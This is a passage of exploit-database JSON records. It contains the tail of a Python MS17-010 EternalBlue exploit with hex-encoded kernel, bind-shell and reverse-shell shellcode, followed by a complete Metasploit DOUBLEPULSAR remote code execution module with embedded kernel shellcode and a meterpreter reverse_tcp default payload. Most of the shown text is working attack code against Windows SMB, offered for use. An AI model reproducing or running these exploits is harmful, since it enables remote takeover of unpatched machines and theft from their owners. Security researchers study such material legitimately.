4d3039f18b452c7418e8f20000008d4604506a00ff550885c0746389452c89753001df39f7775329df01c75789f28b753c8b76f089d9f3a45e89d9c1e9028b5d28311e83c604e2f901d039c67c288b452c6089e650ffd089f461e8a10000008b4524d1e831c988c101e98b0931c8894524e868000000b010eb08b020eb04b030eb008b4d38b4006601411e8b45108944241c61ff603c8d45488b4d0c89884701000089a83e01000066b810008b4d386601411e8b45108944241c6168000000008b403c506800000000c331c088c8c1e90800c8c1e90800c8c1e90800c8c3518b452489c10fc9d1e031c889452859c360e80b0000008b45108b483c89483861c3608b5d2c85db740d31c089df8b4d30f3aa53ff550c31c089453089452c61c357525689cf8b55448b0ae83900000085c0750e83c2088b0ae82b00000085c07421894d446a0c588d71543b06740783c6043b06750d3b4604750889753c31c040eb0231c05e5a5fc331c039c17d0140c3525131d2668b510201ca3b11740583c104ebf75a8d411c83c00724f88945448b41f889453889d15ac35355575641544155415641574889e54881ec800000006683e4f0e883030000488945f84889c3b92e5b51d2e8ee0100004885c00f84d50100004889c6b9940169e3e8d80100004885c00f84bf010000488945f04889c7b9855483f0e8be0100004885c00f84a5010000488945e84c8d4dd04d31c04c89c1448945d04c89c2b10bffd6448b45d04585c00f847f0100008b55d04831c9ffd74885c00f846e0100004889c34831c94989c9448b45d04889c2b10bffd64885c00f85510100004889d8482df80000004805280100008b55d081ea280100000f8c330100008955d050e83f0200004889c258b9fa3cadc24839ca740ab91abd4b2b4839ca75ca488b70e84889d9ff55e84889f04831d24889c38b503c4801d04889c64831c94889ca668b4806668b50144801d64883c61848bf2e646174610000004883f9000f84cd000000488b064839f874094883c62848ffc9ebe58b460c8b4e084801c648bbfefefefefefefefe4883e9084883f9000f8c9b000000488b3e4839df750c4c8b86980000004d85c074064883c608ebd84883c608488975e04831c9baf00f0000ff55f04885c074694989c14831c0b9000400004c89cff3ab4c89cf4883c760488d35910200004831c966b93602f3a44d8909488b5df8498959084831df488b5df0498959104831df488b5de8498959184831df488b5de0498959204831df41897944488b45e04883c0704983c1604c890848')\r\n \r\n # ASM Multi-Arch Kernel Ring 0 Shellcode by ZeroSum0x0: https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm\r\n # Modification to this shellcode:\r\n # Code has been modified to call \"KeUnstackDetachProcess\" aproper KeUnstackDetachProcess routine detaches the current thread from the address space of a process and restores the previous attach state. \r\n # Every successful call to KeStackAttachProcess must be matched by a subsequent call to KeUnstackDetachProcess. \r\n kernel_shellcode = binascii.unhexlify(b'b9820000c00f3248bbf80fd0ffffffffff8953048903488d050a0000004889c248c1ea200f30c30f01f865488924251000000065488b2425a801000050535152565755415041514152415341544155415641576a2b65ff34251000000041536a33514c89d14883ec08554881ec58010000488dac248000000048899dc00000004889bdc80000004889b5d000000048a1f80fd0ffffffffff4889c248c1ea204831dbffcb4821d84831c9b9820000c00f30fbe839000000fa65488b2425a80100004883ec78415f415e415d415c415b415a415941585d5f5e5a595b5865488b2425100000000f01f83eff2425f80fd0ff56415741564155415453554889e56683e4f04883ec204c8d35e3ffffff654c8b3c25380000004d8b7f0449c1ef0c49c1e70c4981ef00100000498b376681fe4d5a75ef41bc2004000031db89d983c10481f9000001000f8d5e0100004c89f289cb41bb6655a24be8b401000085c075db498b0e41bba36f722de8a20100004889c6e8480100004181f9bf771fdd75bc498b1e4d8d6e104c89ea4889d941bbe52411dce8790100006a4068001000004d8d4e0849c701001000004d31c04c89f231c948890a48f7d141bb4bca0aee4883ec20e84a010000498b3e488d35e900000031c966030dd70100006681c1f900f3a44889de4881c6080300004889f1488b114c29e251524889d14883ec2041bb2640369de8090100004883c4205a594885c07418488b80c80200004885c0740c4883c24c8b020fbae0057205488b09ebbe4883ea4c4989d431d280c29031c941bb26ac5091e8c80000004889c14c8d898000000041c601c34c89e24989c44d31c041506a01498b065041504883ec2041bbacce554be89800000031d25252415841594c89e141bb1838099ee8820000004c89e941bb22b7b37de8740000004889d941bb0de24d85e8660000004889ec5d5b415c415d415e415f5ec3e9b50000004d31c931c0ac41c1c90d3c617c022c204101c138e075ecc331d265488b5260488b5218488b5220488b12488b7250480fb74a4a4531c931c0ac3c617c022c2041c1c90d4101c1e2ee4539d975da4c8b7a20c34c89f8415141505251564889c28b423c4801d08b80880000004801d0508b4818448b40204901d048ffc9418b34884801d6e878ffffff4539d975ec58448b40244901d066418b0c48448b401c4901d0418b04884801d05e595a41584159415b4153ffe0564157554889e54883ec2041bbda16af92e84dffffff31c95151515141594c8d051a0000005a4883ec2041bb46451b22e868ffffff4889ec5d415f5ec3') \r\n \r\n # Shellcode TCP Bind port: 1337 size 484 bytes\r\n bindtcp_shellcode = binascii.unhexlify(b'fc4881e4f0ffffffe8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e54831c0505049c7c40200053941544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a025950504d31c94d31c048ffc04889c241baea0fdfe0ffd54889c76a1041584c89e24889f941bac2db3767ffd54831d24889f941bab7e938ffffd54d31c04831d24889f941ba74ec3be1ffd54889f94889c741ba756e4d61ffd54881c4b00200004883ec104889e24d31c96a0441584889f941ba02d9c85fffd54883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd54801c34829c64885f675e141ffe758')\r\n \r\n # Shellcode TCP Reverse to 192.168.125.133 1337 \r\n reversetcp_shellcode = binascii.unhexlify(b'fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000539c0a87d8541544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd550504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd54881c44002000049b8636d640000000000415041504889e25757574d31c06a0d594150e2fc66c74424540101488d442418c600684889e6565041504150415049ffc0415049ffc84d89c14c89c141ba79cc3f86ffd54831d248ffca8b0e41ba08871d60ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5')\r\n \r\n shellcode = reversetcp_shellcode\r\n new_shellcode = kernel_shellcode + int(len(shellcode)).to_bytes(2,'little') + shellcode\r\n to_replace = orig_shellcode[:len(new_shellcode)]\r\n new_datfile = []\r\n for i in datfile:\r\n if i[0] != 'send':\r\n new_datfile.append(i)\r\n continue\r\n j = list(i)\r\n j[2] = j[2].replace(to_replace,new_shellcode)\r\n new_datfile.append(tuple(j))\r\n open(\"smb.dat\",\"w\").write(\"\\n\\n\".join([repr(i) for i in new_datfile]))\r\n \r\ndef main(hostip):\r\n # Modify original .dat file and add/replace Kernel Shellcode by Zerosum0x0 + User Shellcode\r\n mod_replay()\r\n # Read dat file and send it over\r\n dattosend = open(\"smb.dat\").read().split(\"\\n\\n\")\r\n dattosend = [ast.literal_eval(i) for i in dattosend]\r\n connections = []\r\n userid = b'\\x00\\x08'\r\n treeid = b'\\x00\\x08'\r\n start = time.monotonic()\r\n for i in dattosend:\r\n delta = i[-1] - (start - time.monotonic())\r\n if delta > 0:\r\n time.sleep(delta)\r\n start = time.monotonic()\r\n if i[0] == \"connect\":\r\n sock = socket.socket()\r\n sock.connect((hostip,445))\r\n connections.append({\"socket\":sock,\"stream\" : i[1]})\r\n if i[0] == \"close\":\r\n [j['socket'].close() for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"send\":\r\n data = i[2].replace(b\"__USERID__PLACEHOLDER__\", userid)\r\n data = data.replace(b\"__TREEID__PLACEHOLDER__\", treeid)\r\n [j['socket'].send(data) for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"recv\":\r\n data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]\r\n if len(i) > 3:\r\n if i[2] == \"treeid\":\r\n treeid = data[0][28:30]\r\n if i[2] == \"userid\":\r\n userid = data[0][32:34]\r\n os.remove(\"smb.dat\")\r\n print(\"[*] Thanks NSA!\")\r\n print(\"[*] Creditz: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco\")\r\n print(\"[*] KPN Red team: <[email\u00a0protected]>\")\r\n \r\nif __name__ == \"__main__\":\r\n print(\"[*] MS17-010 Exploit - SMBv1 SrvOs2FeaToNt OOB\")\r\n print(\"[*] Exploit running.. Please wait\")\r\n main(sys.argv[1])\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/27752", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-12-24T11:25:14", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-04T00:00:00", "type": "zdt", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148"], "modified": "2020-02-04T00:00:00", "id": "1337DAY-ID-33895", "href": "https://0day.today/exploit/description/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/33895", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-12T21:52:02", "description": "This Metasploit module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 